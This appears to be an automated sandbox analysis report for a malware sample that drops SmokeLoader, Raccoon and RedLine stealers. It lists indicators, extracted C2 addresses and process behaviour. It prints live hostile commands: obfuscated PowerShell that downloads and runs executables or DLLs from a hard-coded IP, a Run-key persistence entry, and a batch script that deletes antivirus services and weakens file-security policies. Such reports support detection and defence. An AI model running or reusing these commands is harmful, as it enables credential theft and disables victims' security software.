Analysis

max time kernel: 150s
max time network: 158s
platform: windows10_x64
resource: win10v20210408
submitted: 13-08-2021 06:45

Static task: static1
Behavioral task: behavioral1
  Sample: 3da56853cea772e7f90f92c66d8c0a31.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 3da56853cea772e7f90f92c66d8c0a31.exe
  Resource: win10v20210408

General

Target: 3da56853cea772e7f90f92c66d8c0a31.exe
Size: 320KB
MD5: 3da56853cea772e7f90f92c66d8c0a31
SHA1: 45a659f9006fb9703a1fef5fc9044a84788228ef
SHA256: 776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a
SHA512: 0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8
Malware Config

Extracted: http://193.56.146.55/Api/GetFile2

Extracted: smokeloader, version 2020
Extracted: raccoon
  471c70de3b4f9e4d493e418d1f60a90659057de0
  url4cnc: https://telete.in/p1rosto100xx

Extracted: raccoon
  cd8dc1031358b1aec55cc6bc447df1018b068607
  url4cnc: https://telete.in/jagressor_kz
Signatures

Raccoon Stealer Payload (5 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/208-182-0x000000000044003F-mapping.dmp | family_raccoon
behavioral2/memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmp | family_raccoon
behavioral2/memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmp | family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess (1 IoCs)
Processes:
description | pid | process | target process
PID 3628 created 1640 | 3628 | WerFault.exe | 936B.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Blocklisted process makes network request (1 IoCs)
Processes:
flow | pid | process
204 | 680 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (7 IoCs)
Processes:
pid | process
208 | 2EF0.exe
2972 | 3153.exe
3476 | 3403.exe
2100 | 3B96.exe
1396 | Runtimebroker.exe
208 | 3403.exe
1640 | 936B.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3B96.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3B96.exe

Deletes itself (1 IoCs)
Processes:
pid | process
3016 |

Drops startup file (3 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe

Loads dropped DLL (1 IoCs)
Processes:
pid | process
208 | 3403.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\3B96.exe | themida
C:\Users\Admin\AppData\Local\Temp\3B96.exe | themida
behavioral2/memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmp | themida

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3B96.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
Processes:
pid | process
2100 | 3B96.exe

Suspicious use of SetThreadContext (2 IoCs)
Processes:
description | pid | process | target process
PID 3128 set thread context of 1872 | 3128 | 3da56853cea772e7f90f92c66d8c0a31.exe | 3da56853cea772e7f90f92c66d8c0a31.exe
PID 3476 set thread context of 208 | 3476 | 3403.exe | 3403.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (18 IoCs)
Processes:
pid | pid_target | process | target process
4076 | 208 | WerFault.exe | 2EF0.exe
1312 | 208 | WerFault.exe | 2EF0.exe
772 | 208 | WerFault.exe | 2EF0.exe
1856 | 208 | WerFault.exe | 2EF0.exe
2272 | 208 | WerFault.exe | 2EF0.exe
1240 | 208 | WerFault.exe | 2EF0.exe
632 | 1396 | WerFault.exe | Runtimebroker.exe
1436 | 1396 | WerFault.exe | Runtimebroker.exe
1920 | 1396 | WerFault.exe | Runtimebroker.exe
1164 | 1396 | WerFault.exe | Runtimebroker.exe
2056 | 1396 | WerFault.exe | Runtimebroker.exe
3644 | 1396 | WerFault.exe | Runtimebroker.exe
1920 | 208 | WerFault.exe | 3403.exe
2152 | 1640 | WerFault.exe | 936B.exe
3000 | 1640 | WerFault.exe | 936B.exe
2416 | 1640 | WerFault.exe | 936B.exe
4084 | 1640 | WerFault.exe | 936B.exe
3628 | 1640 | WerFault.exe | 936B.exe

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3da56853cea772e7f90f92c66d8c0a31.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3da56853cea772e7f90f92c66d8c0a31.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3da56853cea772e7f90f92c66d8c0a31.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
pid | process | count
1872 | 3da56853cea772e7f90f92c66d8c0a31.exe | 2
3016 | | 62

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
pid | process
3016 |

Suspicious behavior: MapViewOfSection (19 IoCs)
Processes:
pid | process | count
1872 | 3da56853cea772e7f90f92c66d8c0a31.exe | 1
3016 | | 18

Suspicious use of AdjustPrivilegeToken (55 IoCs)
Processes:
description | pid | process
Token: SeRestorePrivilege | 4076 | WerFault.exe
Token: SeBackupPrivilege | 4076 | WerFault.exe
Token: SeDebugPrivilege | 4076 | WerFault.exe
Token: SeDebugPrivilege | 1312 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 772 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 1856 | WerFault.exe
Token: SeDebugPrivilege | 2272 | WerFault.exe
Token: SeDebugPrivilege | 1240 | WerFault.exe
Token: SeDebugPrivilege | 2100 | 3B96.exe
Token: SeDebugPrivilege | 632 | WerFault.exe
Token: SeDebugPrivilege | 1436 | WerFault.exe
Token: SeDebugPrivilege | 1920 | WerFault.exe
Token: SeDebugPrivilege | 1164 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 2056 | WerFault.exe
Token: SeDebugPrivilege | 3644 | WerFault.exe
Token: SeDebugPrivilege | 1320 | powershell.exe
Token: SeDebugPrivilege | 3476 | 3403.exe
Token: SeDebugPrivilege | 1920 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 680 | powershell.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 2152 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 3000 | WerFault.exe
Token: SeDebugPrivilege | 2416 | WerFault.exe
Token: SeDebugPrivilege | 4084 | WerFault.exe
Token: SeDebugPrivilege | 3628 | WerFault.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeDebugPrivilege | 1924 | powershell.exe
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |
Token: SeShutdownPrivilege | 3016 |
Token: SeCreatePagefilePrivilege | 3016 |

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
pid | process | count
3016 | | 2

Suspicious use of SendNotifyMessage (3 IoCs)
Processes:
pid | process | count
3016 | | 3

Suspicious use of UnmapMainImage (1 IoCs)
Processes:
pid | process
3016 |

Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
description | pid | process | target process | count
PID 3128 wrote to memory of 1872 | 3128 | 3da56853cea772e7f90f92c66d8c0a31.exe | 3da56853cea772e7f90f92c66d8c0a31.exe | 6
PID 3016 wrote to memory of 208 | 3016 | | 2EF0.exe | 3
PID 3016 wrote to memory of 2972 | 3016 | | 3153.exe | 3
PID 3016 wrote to memory of 3476 | 3016 | | 3403.exe | 3
PID 3016 wrote to memory of 2100 | 3016 | | 3B96.exe | 3
PID 208 wrote to memory of 1396 | 208 | 2EF0.exe | Runtimebroker.exe | 3
PID 2972 wrote to memory of 668 | 2972 | 3153.exe | cmd.exe | 3
PID 1396 wrote to memory of 1320 | 1396 | Runtimebroker.exe | powershell.exe | 3
PID 3476 wrote to memory of 208 | 3476 | 3403.exe | 3403.exe | 9
PID 3016 wrote to memory of 1640 | 3016 | | 936B.exe | 3
PID 3016 wrote to memory of 1924 | 3016 | | explorer.exe | 4
PID 1396 wrote to memory of 680 | 1396 | Runtimebroker.exe | powershell.exe | 3
PID 3016 wrote to memory of 196 | 3016 | | explorer.exe | 3
PID 3016 wrote to memory of 3464 | 3016 | | explorer.exe | 4
PID 3016 wrote to memory of 1320 | 3016 | | explorer.exe | 3
PID 3016 wrote to memory of 3008 | 3016 | | explorer.exe | 4
PID 680 wrote to memory of 1924 | 680 | powershell.exe | powershell.exe | 3
PID 3016 wrote to memory of 2432 | 3016 | | explorer.exe | 1

Processes

C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe  (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe  (depth 2)
  command line: "C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\2EF0.exe  (depth 1)
  command line: C:\Users\Admin\AppData\Local\Temp\2EF0.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 788
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 868
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 836
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 912
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 848
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 2)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 924
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\Runtimebroker.exe  (depth 2)
  command line: "C:\ProgramData\Runtimebroker.exe"
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 732
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 784
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 764
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 784
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 976
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe  (depth 3)
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1008
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
  command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
  command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 4)
  command line: "powershell" Get-MpPreference -verbose
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe  (depth 4)
  command line (batch contents, one command per line): "C:\Windows\System32\cmd.exe"
  @echo off
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
  Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
  set "osX=%PROCESSOR_ARCHITECTURE%"
  if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
  if "%osX%"=="x86" (
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
  ) else (
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
